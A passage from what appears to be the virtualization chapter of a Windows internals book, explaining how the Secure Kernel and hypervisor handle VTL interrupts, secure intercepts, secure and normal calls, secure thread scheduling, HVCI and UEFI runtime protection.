with its own VTL, to have a secure timer facility which can’t be interfered with by less secure VTLs, and to
be able to prevent interrupts directed to lower VTLs while executing code at a higher VTL. Furthermore, a
VTL should be able to send IPI interrupts to other processors. This design produces the following scenarios:
I
When running at a particular VTL, reception of interrupts targeted at the current VTL results in
standard interrupt handling (as determined by the virtual APIC controller of the VP).
I
When an interrupt is received that is targeted at a higher VTL, receipt of the interrupt results in
a switch to the higher VTL to which the interrupt is targeted if the IRQL value for the higher VTL
would allow the interrupt to be presented. If the IRQL value of the higher VTL does not allow
the interrupt to be delivered, the interrupt is queued without switching the current VTL. This
behavior allows a higher VTL to selectively mask interrupts when returning to a lower VTL. This
could be useful if the higher VTL is running an interrupt service routine and needs to return to a
lower VTL for assistance in processing the interrupt.
I
When an interrupt is received that is targeted at a lower VTL than the current executing VTL
of a virtual processor, the interrupt is queued for future delivery to the lower VTL. An interrupt
targeted at a lower VTL will never preempt execution of the current VTL. Instead, the interrupt is
presented when the virtual processor next transitions to the targeted VTL.
CHAPTER 9 Virtualization technologies
347
Preventing interrupts directed to lower VTLs is not always a great solution. In many cases, it could
lead to the slowing down of the normal OS execution (especially in mission-critical or game environ-
ments). To better manage these conditions, the VINA has been introduced. As part of its normal event
dispatch loop, the hypervisor checks whether there are pending interrupts queued to a lower VTL. If so,
the hypervisor injects a VINA interrupt to the current executing VTL. The Secure Kernel has a handler
registered for the VINA vector in its virtual IDT. The handler (ShvlVinaHandler function) executes a nor-
mal call (NORMALKERNEL_VINA) to VTL 0 (Normal and Secure Calls are discussed later in this chapter).
This call forces the hypervisor to switch to the normal kernel (VTL 0). As long as the VTL is switched, all
the queued interrupts will be correctly dispatched. The normal kernel will reenter VTL 1 by emitting a
SECUREKERNEL_RESUMETHREAD Secure Call.
Secure IRQLs
The VINA handler will not always be executed in VTL 1. Similar to the NT kernel, this depends on the
actual IRQL the code is executing into. The current executing code’s IRQL masks all the interrupts that are
associated with an IRQL that’s less than or equal to it. The mapping between an interrupt vector and the
IRQL is maintained by the Task Priority Register (TPR) of the virtual APIC, like in case of real physical APICs
(consult the Intel Architecture Manual for more information). As shown in Figure 9-32, the Secure Kernel
supports different levels of IRQL compared to the normal kernel. Those IRQL are called Secure IRQL.
Synthetic Interrupts
(Hypervisor Generated)
Software Interrupts
Normal Thread Execution
High/Intercept
IPI
Timer
VINA
Normal Raised
DPC/Dispatch
APC
Passive/Low
Unused
Vectors
15
14
5
4
3
2
1
0
FIGURE 9-32 Secure Kernel interrupts request levels (IRQL).
The first three secure IRQL are managed by the Secure Kernel in a way similar to the normal world.
Normal APCs and DPCs (targeting VTL 0) still can’t preempt code executing in VTL 1 through the hyper-
visor, but the VINA interrupt is still delivered to the Secure Kernel (the operating system manages the
three software interrupts by writing in the target processor’s APIC Task-Priority Register, an operation
that causes a VMEXIT to the hypervisor. For more information about the APIC TPR, see the Intel, AMD,
or ARM manuals). This means that if a normal-mode DPC is targeted at a processor while it is executing
VTL 1 code (at a compatible secure IRQL, which should be less than Dispatch), the VINA interrupt will
be delivered and will switch the execution context to VTL 0. As a matter of fact, this executes the DPC
in the normal world and raises for a while the normal kernel’s IRQL to dispatch level. When the DPC
queue is drained, the normal kernel’s IRQL drops. Execution flow returns to the Secure Kernel thanks to
348
CHAPTER 9 Virtualization technologies
the VSM communication loop code that is located in the VslpEnterIumSecureMode routine. The loop
processes each normal call originated from the Secure Kernel.
The Secure Kernel maps the first three secure IRQLs to the same IRQL of the normal world. When
a Secure call is made from code executing at a particular IRQL (still less or equal to dispatch) in the
normal world, the Secure Kernel switches its own secure IRQL to the same level. Vice versa, when the
Secure Kernel executes a normal call to enter the NT kernel, it switches the normal kernel’s IRQL to the
same level as its own. This works only for the first three levels.
The normal raised level is used when the NT kernel enters the secure world at an IRQL higher than
the DPC level. In those cases, the Secure Kernel maps all of the normal-world IRQLs, which are above
DPC, to its normal raised secure level. Secure Kernel code executing at this level can’t receive any VINA
for any kind of software IRQLs in the normal kernel (but it can still receive a VINA for hardware inter-
rupts). Every time the NT kernel enters the secure world at a normal IRQL above DPC, the Secure Kernel
raises its secure IRQL to normal raised.
Secure IRQLs equal to or higher than VINA can never be preempted by any code in the normal
world. This explains why the Secure Kernel supports the concept of secure, nonpreemptable timers
and Secure Intercepts. Secure timers are generated from the hypervisor’s clock interrupt service rou-
tine (ISR). This ISR, before injecting a synthetic clock interrupt to the NT kernel, checks whether there
are one or more secure timers that are expired. If so, it injects a synthetic secure timer interrupt to VTL 1.
Then it proceeds to forward the clock tick interrupt to the normal VTL.
Secure intercepts
There are cases where the Secure Kernel may need to prevent the NT kernel, which executes at a lower
VTL, from accessing certain critical system resources. For example, writes to some processor’s MSRs
could potentially be used to mount an attack that would disable the hypervisor or subvert some of its
protections. VSM provides a mechanism to allow a higher VTL to lock down critical system resources
and prevent access to them by lower VTLs. The mechanism is called secure intercepts.
Secure intercepts are implemented in the Secure Kernel by registering a synthetic interrupt, which
is provided by the hypervisor (remapped in the Secure Kernel to vector 0xF0). The hypervisor, when
certain events cause a VMEXIT, injects a synthetic interrupt to the higher VTL on the virtual processor
that triggered the intercept. At the time of this writing, the Secure Kernel registers with the hypervisor
for the following types of intercepted events:
I
Write to some vital processor’s MSRs (Star, Lstar, Cstar, Efer, Sysenter, Ia32Misc, and APIC base
on AMD64 architectures) and special registers (GDT, IDT, LDT)
I
Write to certain control registers (CR0, CR4, and XCR0)
I
Write to some I/O ports (ports 0xCF8 and 0xCFC are good examples; the intercept manages the
reconfiguration of PCI devices)
I
Invalid access to protected guest physical memory
CHAPTER 9 Virtualization technologies
349
When VTL 0 software causes an intercept that will be raised in VTL 1, the Secure Kernel needs to
recognize the intercept type from its interrupt service routine. For this purpose, the Secure Kernel uses
the message queue allocated by the SynIC for the “Intercept” synthetic interrupt source (see the “Inter-
partition communication” section previously in this section for more details about the SynIC and SINT).
The Secure Kernel is able to discover and map the physical memory page by checking the SIMP syn-
thetic MSR, which is virtualized by the hypervisor. The mapping of the physical page is executed at the
Secure Kernel initialization time in VTL 1. The Secure Kernel’s startup is described later in this chapter.
Intercepts are used extensively by HyperGuard with the goal to protect sensitive parts of the normal
NT kernel. If a malicious rootkit installed in the NT kernel tries to modify the system by writing a par-
ticular value to a protected register (for example to the syscall handlers, CSTAR and LSTAR, or model-
specific registers), the Secure Kernel intercept handler (ShvlpInterceptHandler) filters the new register’s
value, and, if it discovers that the value is not acceptable, it injects a General Protection Fault (GPF)
nonmaskable exception to the NT kernel in VLT 0. This causes an immediate bugcheck resulting in the
system being stopped. If the value is acceptable, the Secure Kernel writes the new value of the register
using the hypervisor through the HvSetVpRegisters hypercall (in this case, the Secure Kernel is proxying
the access to the register).
Control over hypercalls
The last intercept type that the Secure Kernel registers with the hypervisor is the hypercall intercept.
The hypercall intercept’s handler checks that the hypercall emitted by the VTL 0 code to the hypervi-
sor is legit and is originated from the operating system itself, and not through some external mod-
ules. Every time in any VTL a hypercall is emitted, it causes a VMEXIT in the hypervisor (by design).
Hypercalls are the base service used by kernel components of each VTL to request services between
each other (and to the hypervisor itself). The hypervisor injects a synthetic intercept interrupt to the
higher VTL only for hypercalls used to request services directly to the hypervisor, skipping all the hy-
percalls used for secure and normal calls to and from the Secure Kernel.
If the hypercall is not recognized as valid, it won’t be executed: the Secure Kernel in this case
updates the lower VTL’s registers with the goal to signal the hypercall error. The system is not crashed
(although this behavior can change in the future); the calling code can decide how to manage the error.
VSM system calls
As we have introduced in the previous sections, VSM uses hypercalls to request services to and from
the Secure Kernel. Hypercalls were originally designed as a way to request services to the hypervisor,
but in VSM the model has been extended to support new types of system calls:
I
Secure calls are emitted by the normal NT kernel in VTL 0 to require services to the Secure Kernel.
I
Normal calls are requested by the Secure Kernel in VTL 1 when it needs services provided by
the NT kernel, which runs in VTL 0. Furthermore, some of them are used by secure processes
(trustlets) running in Isolated User Mode (IUM) to request services from the Secure Kernel or
the normal NT kernel.
350
CHAPTER 9 Virtualization technologies
These kinds of system calls are implemented in the hypervisor, the Secure Kernel, and the normal
NT kernel. The hypervisor defines two hypercalls for switching between different VTLs: HvVtlCall and
HvVtlReturn. The Secure Kernel and NT kernel define the dispatch loop used for dispatching Secure and
Normal Calls.
Furthermore, the Secure Kernel implements another type of system call: secure system calls. They
provide services only to secure processes (trustlets), which run in IUM. These system calls are not exposed
to the normal NT kernel. The hypervisor is not involved at all while processing secure system calls.
Virtual processor state
Before delving into the Secure and Normal calls architecture, it is necessary to analyze how the virtual
processor manages the VTL transition. Secure VTLs always operate in long mode (which is the execu-
tion model of AMD64 processors where the CPU accesses 64-bit-only instructions and registers), with
paging enabled. Any other execution model is not supported. This simplifies launch and management
of secure VTLs and also provides an extra level of protection for code running in secure mode. (Some
other important implications are discussed later in the chapter.)
For efficiency, a virtual processor has some registers that are shared between VTLs and some other
registers that are private to each VTL. The state of the shared registers does not change when switching
between VTLs. This allows a quick passing of a small amount of information between VTLs, and it also
reduces the context switch overhead when switching between VTLs. Each VTL has its own instance of
private registers, which could only be accessed by that VTL. The hypervisor handles saving and restor-
ing the contents of private registers when switching between VTLs. Thus, when entering a VTL on a
virtual processor, the state of the private registers contains the same values as when the virtual proces-
sor last ran that VTL.
Most of a virtual processor’s register state is shared between VTLs. Specifically, general purpose
registers, vector registers, and floating-point registers are shared between all VTLs with a few excep-
tions, such as the RIP and the RSP registers. Private registers include some control registers, some
architectural registers, and hypervisor virtual MSRs. The secure intercept mechanism (see the previous
section for details) is used to allow the Secure environment to control which MSR can be accessed by
the normal mode environment. Table 9-3 summarizes which registers are shared between VTLs and
which are private to each VTL.
CHAPTER 9 Virtualization technologies
351
TABLE 9-3 Virtual processor per-VTL register states
Type
General Registers
MSRs
Shared
Rax, Rbx, Rcx, Rdx, Rsi, Rdi, Rbp
CR2
R8 – R15
DR0 – DR5
X87 floating point state
XMM registers
AVX registers
XCR0 (XFEM)
DR6 (processor-dependent)
HV_X64_MSR_TSC_FREQUENCY
HV_X64_MSR_VP_INDEX
HV_X64_MSR_VP_RUNTIME
HV_X64_MSR_RESET
HV_X64_MSR_TIME_REF_COUNT
HV_X64_MSR_GUEST_IDLE
HV_X64_MSR_DEBUG_DEVICE_OPTIONS
HV_X64_MSR_BELOW_1MB_PAGE
HV_X64_MSR_STATS_PARTITION_RETAIL_PAGE
HV_X64_MSR_STATS_VP_RETAIL_PAGE
MTRR’s and PAT
MCG_CAP
MCG_STATUS
Private
RIP, RSP
RFLAGS
CR0, CR3, CR4
DR7
IDTR, GDTR
CS, DS, ES, FS, GS, SS, TR, LDTR
TSC
DR6 (processor-dependent)
SYSENTER_CS, SYSENTER_ESP, SYSENTER_EIP, STAR, LSTAR, CSTAR,
SFMASK, EFER, KERNEL_GSBASE, FS.BASE, GS.BASE
HV_X64_MSR_HYPERCALL
HV_X64_MSR_GUEST_OS_ID
HV_X64_MSR_REFERENCE_TSC
HV_X64_MSR_APIC_FREQUENCY
HV_X64_MSR_EOI
HV_X64_MSR_ICR
HV_X64_MSR_TPR
HV_X64_MSR_APIC_ASSIST_PAGE
HV_X64_MSR_NPIEP_CONFIG
HV_X64_MSR_SIRBP
HV_X64_MSR_SCONTROL
HV_X64_MSR_SVERSION
HV_X64_MSR_SIEFP
HV_X64_MSR_SIMP
HV_X64_MSR_EOM
HV_X64_MSR_SINT0 – HV_X64_MSR_SINT15
HV_X64_MSR_STIMER0_CONFIG – HV_X64_MSR_STIMER3_CONFIG
HV_X64_MSR_STIMER0_COUNT -HV_X64_MSR_STIMER3_COUNT
Local APIC registers (including CR8/TPR)
Secure calls
When the NT kernel needs services provided by the Secure Kernel, it uses a special function,
VslpEnterIumSecureMode. The routine accepts a 104-byte data structure (called SKCALL), which is used
to describe the kind of operation (invoke service, flush TB, resume thread, or call enclave), the secure
call number, and a maximum of twelve 8-byte parameters. The function raises the processor’s IRQL,
if necessary, and determines the value of the Secure Thread cookie. This value communicates to the
Secure Kernel which secure thread will process the request. It then (re)starts the secure calls dispatch
loop. The executability state of each VTL is a state machine that depends on the other VTL.
The loop described by the VslpEnterIumSecureMode function manages all the operations shown
on the left side of Figure 9-33 in VTL 0 (except the case of Secure Interrupts). The NT kernel can decide
to enter the Secure Kernel, and the Secure Kernel can decide to enter the normal NT kernel. The loop
starts by entering the Secure Kernel through the HvlSwitchToVsmVtl1 routine (specifying the opera-
tion requested by the caller). The latter function, which returns only if the Secure Kernel requests a VTL
switch, saves all the shared registers and copies the entire SKCALL data structure in some well-defined
CPU registers: RBX and the SSE registers XMM10 through XMM15. Finally, it emits an HvVtlCall hypercall
to the hypervisor. The hypervisor switches to the target VTL (by loading the saved per-VTL VMCS) and
352
CHAPTER 9 Virtualization technologies
writes a VTL secure call entry reason to the VTL control page. Indeed, to be able to determine why a se-
cure VTL was entered, the hypervisor maintains an informational memory page that is shared by each
secure VTL. This page is used for bidirectional communication between the hypervisor and the code
running in a secure VTL on a virtual processor.
VTL 0
VTL 1
Normal Call Processed OR
Secure Interrupt*
Start/Resume a Secure Thread OR
Emit a Secure Call OR
VINA Processed OR
Terminate a Secure Thread OR
Secure Call Processed OR
Process the VINA OR
Emits a Normal Call OR
Secure Interrupt Processed *
Secure Kernel
Secure Kernel
NT Kernel
NT Kernel
FIGURE 9-33 The VSM dispatch loop.
The virtual processor restarts the execution in VTL 1 context, in the SkCallNormalMode function of
the Secure Kernel. The code reads the VTL entry reason; if it’s not a Secure Interrupt, it loads the current
processor SKPRCB (Secure Kernel processor control block), selects a thread on which to run (starting
from the secure thread cookie), and copies the content of the SKCALL data structure from the CPU
shared registers to a memory buffer. Finally, it calls the IumInvokeSecureService dispatcher routine,
which will process the requested secure call, by dispatching the call to the correct function (and imple-
ments part of the dispatch loop in VTL 1).
An important concept to understand is that the Secure Kernel can map and access VTL 0 memory, so
there’s no need to marshal and copy any eventual data structure, pointed by one or more parameters, to
the VTL 1 memory. This concept won’t apply to a normal call, as we will discuss in the next section.
As we have seen in the previous section, Secure Interrupts (and intercepts) are dispatched by the
hypervisor, which preempts any code executing in VTL 0. In this case, when the VTL 1 code starts the ex-
ecution, it dispatches the interrupt to the right ISR. After the ISR finishes, the Secure Kernel immediately
emits a HvVtlReturn hypercall. As a result, the code in VTL 0 restarts the execution at the point in which
it has been previously interrupted, which is not located in the secure calls dispatch loop. Therefore,
Secure Interrupts are not part of the dispatch loop even if they still produce a VTL switch.
Normal calls
Normal calls are managed similarly to the secure calls (with an analogous dispatch loop located in
VTL 1, called normal calls loop), but with some important differences:
I
All the shared VTL registers are securely cleaned up by the Secure Kernel before emitting the
HvVtlReturn to the hypervisor for switching the VTL. This prevents leaking any kind of secure
data to normal mode.
CHAPTER 9 Virtualization technologies
353
I
The normal NT kernel can’t read secure VTL 1 memory. For correctly passing the syscall param-
eters and data structures needed for the normal call, a memory buffer that both the Secure
Kernel and the normal kernel can share is required. The Secure Kernel allocates this shared
buffer using the ALLOCATE_VM normal call (which does not require passing any pointer as a pa-
rameter). The latter is dispatched to the MmAllocateVirtualMemory function in the NT normal
kernel. The allocated memory is remapped in the Secure Kernel at the same virtual address and
has become part of the Secure process’s shared memory pool.
I
As we will discuss later in the chapter, the Isolated User Mode (IUM) was originally designed
to be able to execute special Win32 executables, which should have been capable of running
indifferently in the normal world or in the secure world. The standard unmodified Ntdll.dll and
KernelBase.dll libraries are mapped even in IUM. This fact has the important consequence of
requiring almost all the native NT APIs (which Kernel32.dll and many other user mode libraries
depend on) to be proxied by the Secure Kernel.
To correctly deal with the described problems, the Secure Kernel includes a marshaler, which identi-
fies and correctly copies the data structures pointed by the parameters of an NT API in the shared buf-
fer. The marshaler is also able to determine the size of the shared buffer, which will be allocated from
the secure process memory pool. The Secure Kernel defines three types of normal calls:
I
A disabled normal call is not implemented in the Secure Kernel and, if called from IUM, it
simply fails with a STATUS_INVALID_SYSTEM_SERVICE exit code. This kind of call can’t be called
directly by the Secure Kernel itself.
I
An enabled normal call is implemented only in the NT kernel and is callable from IUM in its
original Nt or Zw version (through Ntdll.dll). Even the Secure Kernel can request an enabled
normal call—but only through a little stub code that loads the normal call number—set the
highest bit in the number, and call the normal call dispatcher (IumGenericSyscall routine). The
highest bit identifies the normal call as required by the Secure Kernel itself and not by the
Ntdll.dll module loaded in IUM.
I
A special normal call is implemented partially or completely in Secure Kernel (VTL 1), which
can filter the original function’s results or entirely redesign its code.
Enabled and special normal calls can be marked as KernelOnly. In the latter case, the normal call
can be requested only from the Secure Kernel itself (and not from secure processes). We’ve already
provided the list of enabled and special normal calls (which are callable from software running in VSM)
in Chapter 3 of Part 1, in the section named “Trustlet-accessible system calls.”
Figure 9-34 shows an example of a special normal call. In the example, the LsaIso trustlet has called
the NtQueryInformationProcess native API to request information of a particular process. The Ntdll.dll
mapped in IUM prepares the syscall number and executes a SYSCALL instruction, which transfers the
execution flow to the KiSystemServiceStart global system call dispatcher, residing in the Secure Kernel
(VTL 1). The global system call dispatcher recognizes that the system call number belongs to a normal
call and uses the number to access the IumSyscallDispatchTable array, which represents the normal calls
dispatch table.
354
CHAPTER 9 Virtualization technologies
The normal calls dispatch table contains an array of compacted entries, which are generated in
phase 0 of the Secure Kernel startup (discussed later in this chapter). Each entry contains an offset to
a target function (calculated relative to the table itself) and the number of its arguments (with some
flags). All the offsets in the table are initially calculated to point to the normal call dispatcher routine
(IumGenericSyscall). After the first initialization cycle, the Secure Kernel startup routine patches each
entry that represents a special call. The new offset is pointed to the part of code that implements the
normal call in the Secure Kernel.
Lsalso
Trustlet
System Call
Descriptors Array
Secure Kernel
Normal Calls
Dispatch Table
(lumSyscallDispatch
Table)
NtQueryInformationProcess:
MOV
R10,
RCX
MOV
EAX,
19h
SYSCALL
........
........
........
31
NtQueryInformationProcess offset <<5
Index 25
E
0
5 4
# of
Args
Index 26
31
NtAllocateVirtualMemory offset <<5
E
0
5 4
# of
Args
Index 49
31
offset of lumGenericSyscall <<5
E
0
5 4
# of
Args
E = enclave compatible
T = type of normal call
Flags
Base
T
Flags
Base
T
Flags
Base
T
Flags
Base
T
Flags
Base
T
FIGURE 9-34 A trustlet performing a special normal call to the NtQueryInformationProcess API.
As a result, in Figure 9-34, the global system calls dispatcher transfers execution to the
NtQueryInformationProcess function’s part implemented in the Secure Kernel. The latter checks
whether the requested information class is one of the small subsets exposed to the Secure Kernel and, if
so, uses a small stub code to call the normal call dispatcher routine (IumGenericSyscall).
Figure 9-35 shows the syscall selector number for the NtQueryInformationProcess API. Note that the stub
sets the highest bit (N bit) of the syscall number to indicate that the normal call is requested by the Secure
Kernel. The normal call dispatcher checks the parameters and calls the marshaler, which is able to marshal
each argument and copy it in the right offset of the shared buffer. There is another bit in the selector that
further differentiates between a normal call or a secure system call, which is discussed later in this chapter.
1
0
31 30
27 26
S bit = Secure System Call
N bit = Called from the Secure Kernel
NtQueryInformationProcess SYSCALL index (25)
FIGURE 9-35 The Syscall selector number of the Secure Kernel.
CHAPTER 9 Virtualization technologies
355
The marshaler works thanks to two important arrays that describe each normal call: the descriptors
array (shown in the right side of Figure 9-34) and the arguments descriptors array. From these arrays,
the marshaler can fetch all the information that it needs: normal call type, marshalling function index,
argument type, size, and type of data pointed to (if the argument is a pointer).
After the shared buffer has been correctly filled by the marshaler, the Secure Kernel compiles the
SKCALL data structure and enters the normal call dispatcher loop (SkCallNormalMode). This part
of the loop saves and clears all the shared virtual CPU registers, disables interrupts, and moves the
thread context to the PRCB thread (more about thread scheduling later in the chapter). It then copies
the content of the SKCALL data structure in some shared register. As a final stage, it calls the hypervi-
sor through the HvVtlReturn hypercall.
Then the code execution resumes in the secure call dispatch loop in VTL 0. If there are some pending
interrupts in the queue, they are processed as normal (only if the IRQL allows it). The loop recognizes
the normal call operation request and calls the NtQueryInformationProcess function implemented in
VTL 0. After the latter function finished its processing, the loop restarts and reenters the Secure Kernel
again (as for Secure Calls), still through the HvlSwitchToVsmVtl1 routine, but with a different operation
request: Resume thread. This, as the name implies, allows the Secure Kernel to switch to the original
secure thread and to continue the execution that has been preempted for executing the normal call.
The implementation of enabled normal calls is the same except for the fact that those calls have
their entries in the normal calls dispatch table, which point directly to the normal call dispatcher
routine, IumGenericSyscall. In this way, the code will transfer directly to the handler, skipping any
API implementation code in the Secure Kernel.
Secure system calls
The last type of system calls available in the Secure Kernel is similar to standard system calls provided
by the NT kernel to VTL 0 user mode software. The secure system calls are used for providing services
only to the secure processes (trustlets). VTL 0 software can’t emit secure system calls in any way. As
we will discuss in the “Isolated User Mode” section later in this chapter, every trustlet maps the IUM
Native Layer Dll (Iumdll.dll) in its address space. Iumdll.dll has the same job as its counterpart in VTL
0, Ntdll.dll: implement the native syscall stub functions for user mode application. The stub copies the
syscall number in a register and emits the SYSCALL instruction (the instruction uses different opcodes
depending on the platform).
Secure system calls numbers always have the twenty-eighth bit set to 1 (on AMD64 architectures,
whereas ARM64 uses the sixteenth bit). In this way, the global system call dispatcher (KiSystemServiceStart)
recognizes that the syscall number belongs to a secure system call (and not a normal call) and switches
to the SkiSecureServiceTable, which represents the secure system calls dispatch table. As in the case of
normal calls, the global dispatcher verifies that the call number is in the limit, allocates stack space for
the arguments (if needed), calculates the system call final address, and transfers the code execution to it.
Overall, the code execution remains in VTL 1, but the current privilege level of the virtual processor
raises from 3 (user mode) to 0 (kernel mode). The dispatch table for secure system calls is compacted—
similarly to the normal calls dispatch table—at phase 0 of the Secure Kernel startup. However, entries in
this table are all valid and point to functions implemented in the Secure Kernel.
356
CHAPTER 9 Virtualization technologies
Secure threads and scheduling
As we will describe in the “Isolated User Mode” section, the execution units in VSM are the secure
threads, which live in the address space described by a secure process. Secure threads can be kernel
mode or user mode threads. VSM maintains a strict correspondence between each user mode secure
thread and normal thread living in VTL 0.
Indeed, the Secure Kernel thread scheduling depends completely on the normal NT kernel; the
Secure Kernel doesn’t include a proprietary scheduler (by design, the Secure Kernel attack surface
needs to be small). In Chapter 3 of Part 1, we described how the NT kernel creates a process and the
relative initial thread. In the section that describes Stage 4, “Creating the initial thread and its stack
and context,” we explain that a thread creation is performed in two parts:
I
The executive thread object is created; its kernel and user stack are allocated. The
KeInitThread routine is called for setting up the initial thread context for user mode threads.
KiStartUserThread is the first routine that will be executed in the context of the new thread,
which will lower the thread’s IRQL and call PspUserThreadStartup.
I
The execution control is then returned to NtCreateUserProcess, which, at a later stage, calls
PspInsertThread to complete the initialization of the thread and insert it into the object man-
ager namespace.
As a part of its work, when PspInsertThread detects that the thread belongs to a secure process, it
calls VslCreateSecureThread, which, as the name implies, uses the Create Thread secure service call to
ask to the Secure Kernel to create an associated secure thread. The Secure Kernel verifies the param-
eters and gets the process’s secure image data structure (more details about this later in this chapter).
It then allocates the secure thread object and its TEB, creates the initial thread context (the first routine
that will run is SkpUserThreadStartup), and finally makes the thread schedulable. Furthermore, the se-
cure service handler in VTL 1, after marking the thread as ready to run, returns a specific thread cookie,
which is stored in the ETHREAD data structure.
The new secure thread still starts in VTL 0. As described in the “Stage 7” section of Chapter 3 of
Part 1, PspUserThreadStartup performs the final initialization of the user thread in the new context.
In case it determines that the thread’s owning process is a trustlet, PspUserThreadStartup calls the
VslStartSecureThread function, which invokes the secure calls dispatch loop through the VslpEnterIum
SecureMode routine in VTL 0 (passing the secure thread cookie returned by the Create Thread secure
service handler). The first operation that the dispatch loop requests to the Secure Kernel is to resume
the execution of the secure thread (still through the HvVtlCall hypercall).
The Secure Kernel, before the switch to VTL 0, was executing code in the normal call dispatcher
loop (SkCallNormalMode). The hypercall executed by the normal kernel restarts the execution in the
same loop routine. The VTL 1 dispatcher loop recognizes the new thread resume request; it switches
its execution context to the new secure thread, attaches to its address spaces, and makes it runnable.
As part of the context switching, a new stack is selected (which has been previously initialized by the
Create Thread secure call). The latter contains the address of the first secure thread system function,
SkpUserThreadStartup, which, similarly to the case of normal NT threads, sets up the initial thunk con-
text to run the image-loader initialization routine (LdrInitializeThunk in Ntdll.dll).
CHAPTER 9 Virtualization technologies
357
After it has started, the new secure thread can return to normal mode for two main reasons: it emits
a normal call, which needs to be processed in VTL 0, or the VINA interrupts preempt the code execu-
tion. Even though the two cases are processed in a slightly different way, they both result in executing
the normal call dispatcher loop (SkCallNormalMode).
As previously discussed in Part 1, Chapter 4, “Threads,” the NT scheduler works thanks to the pro-
cessor clock, which generates an interrupt every time the system clock fires (usually every 15.6 mil-
liseconds). The clock interrupt service routine updates the processor times and calculates whether the
thread quantum expires. The interrupt is targeted to VTL 0, so, when the virtual processor is executing
code in VTL 1, the hypervisor injects a VINA interrupt to the Secure Kernel, as shown in Figure 9-36.
The VINA interrupt preempts the current executing code, lowers the IRQL to the previous preempted
code’s IRQL value, and emits the VINA normal call for entering VTL 0.
VP 0
Thread 80
Normal
Service Call
Deselect Thread 80 and
Marks It as Not Running
VTL return
VINA
VTL 1
VTL 0
VP 3
Schedules a New Thread
(Thread’s Quantum Expired)
DPC or Clock Timer Interrupt
DPC or Clock Timer Interrupt
Another Thread Is Starting
on VP 0
Schedules Thread 80
Code Resumes in the Secure
Call Dispatch Loop
Select Secure Thread 80
Switch to the New Thread Stack
Resume Thread Execution
VTL Call (Resume Thread)
Normal Call
Dispatch Loop
FIGURE 9-36 Secure threads scheduling scheme.
358
CHAPTER 9 Virtualization technologies
As the standard process of normal call dispatching, before the Secure Kernel emits the HvVtlReturn
hypercall, it deselects the current execution thread from the virtual processor’s PRCB. This is important:
The VP in VTL 1 is not tied to any thread context anymore and, on the next loop cycle, the Secure Kernel
can switch to a different thread or decide to reschedule the execution of the current one.
After the VTL switch, the NT kernel resumes the execution in the secure calls dispatch loop and still
in the context of the new thread. Before it has any chance to execute any code, the code is preempted
by the clock interrupt service routine, which can calculate the new quantum value and, if the latter has
expired, switch the execution of another thread. When a context switch occurs, and another thread
enters VTL 1, the normal call dispatch loop schedules a different secure thread depending on the value
of the secure thread cookie:
I
A secure thread from the secure thread pool if the normal NT kernel has entered VTL 1 for dis-
patching a secure call (in this case, the secure thread cookie is 0).
I
The newly created secure thread if the thread has been rescheduled for execution (the secure
thread cookie is a valid value). As shown in Figure 9-36, the new thread can be also rescheduled
by another virtual processor (VP 3 in the example).
With the described schema, all the scheduling decisions are performed only in VTL 0. The secure
call loop and normal call loops cooperate to correctly switch the secure thread context in VTL 1. All the
secure threads have an associated a thread in the normal kernel. The opposite is not true, though; if a
normal thread in VTL 0 decides to emit a secure call, the Secure Kernel dispatches the request by using
an arbitrary thread context from a thread pool.
The Hypervisor Enforced Code Integrity
Hypervisor Enforced Code Integrity (HVCI) is the feature that powers Device Guard and provides the
W^X (pronounced double-you xor ex) characteristic of the VTL 0 kernel memory. The NT kernel can’t
map and executes any kind of executable memory in kernel mode without the aid of the Secure Kernel.
The Secure Kernel allows only proper digitally signed drivers to run in the machine’s kernel. As we dis-
cuss in the next section, the Secure Kernel keeps track of every virtual page allocated in the normal NT
kernel; memory pages marked as executable in the NT kernel are considered privileged pages. Only the
Secure Kernel can write to them after the SKCI module has correctly verified their content.
You can read more about HVCI in Chapter 7 of Part 1, in the “Device Guard” and “Credential
Guard” sections.
UEFI runtime virtualization
Another service provided by the Secure Kernel (when HVCI is enabled) is the ability to virtualize and
protect the UEFI runtime services. As we discuss in Chapter 12, the UEFI firmware services are mainly
implemented by using a big table of function pointers. Part of the table will be deleted from memory
after the OS takes control and calls the ExitBootServices function, but another part of the table, which
represents the Runtime services, will remain mapped even after the OS has already taken full control
of the machine. Indeed, this is necessary because sometimes the OS needs to interact with the UEFI
configuration and services.
CHAPTER 9 Virtualization technologies
359
Every hardware vendor implements its own UEFI firmware. With HVCI, the firmware should cooper-
ate to provide the nonwritable state of each of its executable memory pages (no firmware page can be
mapped in VTL 0 with read, write, and execute state). The memory range in which the UEFI firmware
resides is described by multiple MEMORY_DESCRIPTOR data structures located in the EFI memory map.
The Windows Loader parses this data with the goal to properly protect the UEFI firmware’s memory.
Unfortunately, in the original implementation of UEFI, the code and data were stored mixed in a single
section (or multiple sections) and were described by relative memory descriptors. Furthermore, some
device drivers read or write configuration data directly from the UEFI’s memory regions. This clearly
was not compatible with HVCI.
For overcoming this problem, the Secure Kernel employs the following two strategies:
I
New versions of the UEFI firmware (which adhere to UEFI 2.6 and higher specifications) main-
tain a new configuration table (linked in the boot services table), called memory attribute table
(MAT). The MAT defines fine-grained sections of the UEFI Memory region, which are subsec-
tions of the memory descriptors defined by the EFI memory map. Each section never has both
the executable and writable protection attribute.
I
For old firmware, the Secure Kernel maps in VTL 0 the entire UEFI firmware region’s physical
memory with a read-only access right.
In the first strategy, at boot time, the Windows Loader merges the information found both in the EFI
memory map and in the MAT, creating an array of memory descriptors that precisely describe the entire
firmware region. It then copies them in a reserved buffer located in VTL 1 (used in the hibernation path)
and verifies that each firmware’s section doesn’t violate the WX assumption. If so, when the Secure
Kernel starts, it applies a proper SLAT protection for every page that belongs to the underlying UEFI
firmware region. The physical pages are protected by the SLAT, but their virtual address space in VTL 0
is still entirely marked as RWX. Keeping the virtual memory’s RWX protection is important because the
Secure Kernel must support resume-from-hibernation in a scenario where the protection applied in the
MAT entries can change. Furthermore, this maintains the compatibility with older drivers, which read or
write directly from the UEFI memory region, assuming that the write is performed in the correct sections.
(Also, the UEFI code should be able to write in its own memory, which is mapped in VTL 0.) This strategy
allows the Secure Kernel to avoid mapping any firmware code in VTL 1; the only part of the firmware that
remains in VTL 1 is the Runtime function table itself. Keeping the table in VTL 1 allows the resume-from-
hibernation code to update the UEFI runtime services’ function pointer directly.
The second strategy is not optimal and is used only for allowing old systems to run with HVCI
enabled. When the Secure Kernel doesn’t find any MAT in the firmware, it has no choice except to map
the entire UEFI runtime services code in VTL 1. Historically, multiple bugs have been discovered in the
UEFI firmware code (in SMM especially). Mapping the firmware in VTL 1 could be dangerous, but it’s the
